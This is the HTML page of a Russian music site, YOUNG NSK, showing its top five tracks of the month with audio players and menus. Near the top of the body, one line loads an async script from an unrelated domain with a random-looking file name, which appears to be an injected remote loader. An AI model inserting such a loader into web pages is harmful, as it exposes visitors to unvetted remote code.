<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>YOUNG NSK | Треки</title>
    <link rel="stylesheet" href="/assets/css/style.css">
    <link rel="shortcut icon" href="/icon.png">
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js"></script>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/pushbar.js@1.0.0/src/pushbar.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
<script src="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js"></script>
</head>
<body id="target">
    <script async language="javascript" charset="UTF-8" type="text/javascript" src="//itdise.info/90d52qh53bm538xpatruvp80r9meapgew798xl2sf87p9ey8coeqx3z.js?3mfjsmqc=524wm"></script>
    <div id="dots"></div>
    <header>
        <a id="dark" href="javascript:void(0)"><img id="yes" ondragstart="return false" src="/meteorology.png" alt="" class="moon"></a>
        <a id="dark2" href="javascript:void(0)"><img id="non" ondragstart="return false" src="/sun.png" alt="" class="moon2"></a>
        <img src="/LOGO.png" alt="" class="logo" ondragstart="return false">
        <div class="menu">
            <a href="/index.html" class="menu_button">Главная</a>
            <a href="/pages/news.html" class="menu_button">Новости</a>
            <a href="/pages/about.html" class="menu_button">О нас</a>
            <a href="/pages/contacts.html" class="menu_button">Контакты</a>
        </div>
    </header>
    <div data-pushbar-id="mypushbar1" data-pushbar-direction="left" class="pus">
        <div class="bg-black">
        <a href="javascript:void(0);"  class="slidee" data-pushbar-close><img src="https://image.flaticon.com/icons/svg/271/271203.svg" alt="" class="close"></a>
    </div> 
        <div class="slidd">
            <h1>YOUNG NSK</h1>
        </div>
        <div class="slidd" id='first'>
        <a href="/index.html" class="menu-slide">Главная</a>
    </div>
    <div class="slidd">
          <a href="/pages/news.html" class="menu-slide">Новости</a>
        </div>
        <div class="slidd">
          <a href="/pages/about.html" class="menu-slide">О нас</a>
        </div>
        <div class="slidd">
          <a href="/pages/contacts.html" class="menu-slide">Контакты</a>
        </div>
      </div>
      <div class="pushbar_main_content">
          <a href="javascript:void(0);" data-pushbar-target="mypushbar1">
            <img id="dier" src="https://image.flaticon.com/icons/svg/876/876207.svg" alt="" class="menu_lide">
          </a>
      </div>
<div class="about">
    <h1>Топ треки месяца</h1>
    <h5 id="latetrack">Последнее обновление</h5>
</div>
<div class="audio_block">
    <h2>1. BOOM</h2>
    <h3>DEAZMORAL</h3>
    <audio controls onplay="other_pause(0)">
        <source src="/assets/top5/e28748f0dbf2.mp3" type="audio/mpeg">
    </audio>
    </div>
<div class="audio_block">
    <h2>2. Тамагочи</h2>
    <h3>INSTACHILD</h3>
    <audio controls onplay="other_pause(1)">
        <source src="/assets/top5/INSTACHILD - Тамагочи.mp3" type="audio/mpeg">
    </audio>
</div>
<div class="audio_block" >
    <h2>3. TERRORIST</h2>
    <h3>F1REBALL</h3>
    <audio controls onplay="other_pause(2)">
        <source src="/assets/top5/F1REBALL - TERRORIST (prod.ash).mp3" type="audio/mpeg">
    </audio>
</div>
<div class="audio_block">
    <h2>4. Десять лет в жизни</h2>
    <h3>Krapiva</h3>
    <audio controls onplay="other_pause(3)">
        <source src="/assets/top5/Krapiva - Десять лет в жизни.mp3" type="audio/mpeg">
    </audio>
</div>
<div class="audio_block">
    <h2>5. РОЛЛ</h2>
    <h3>FAID x COMAN</h3>
    <audio controls onplay="other_pause(4)">
        <source src="/assets/top5/FAID x COMAN - РОЛЛ.mp3" type="audio/mpeg">
    </audio>
</div>
<script src="/assets/js/theme.js"></script>
<script>
    var latest = document.getElementById("latetrack")
    var datetr = "04.06.2020"
    latest.innerHTML = "Последнее обновление: " + datetr
</script>
<script>
    var a=document.getElementsByTagName("audio");
     
    function other_pause(b){
        for(i=0;i<a.length;i++){
            if(!(i==b)){a[i].pause()};
        }
    }
     
    </script>
      <script src="https://cdn.jsdelivr.net/npm/pushbar.js@1.0.0/src/pushbar.min.js"></script>
      <script type="text/javascript">
          const pushbar = new Pushbar({
                blur:true,
                overlay:true,
              });
      </script><script src="/assets/js/dots.js"></script>
</body>
</html>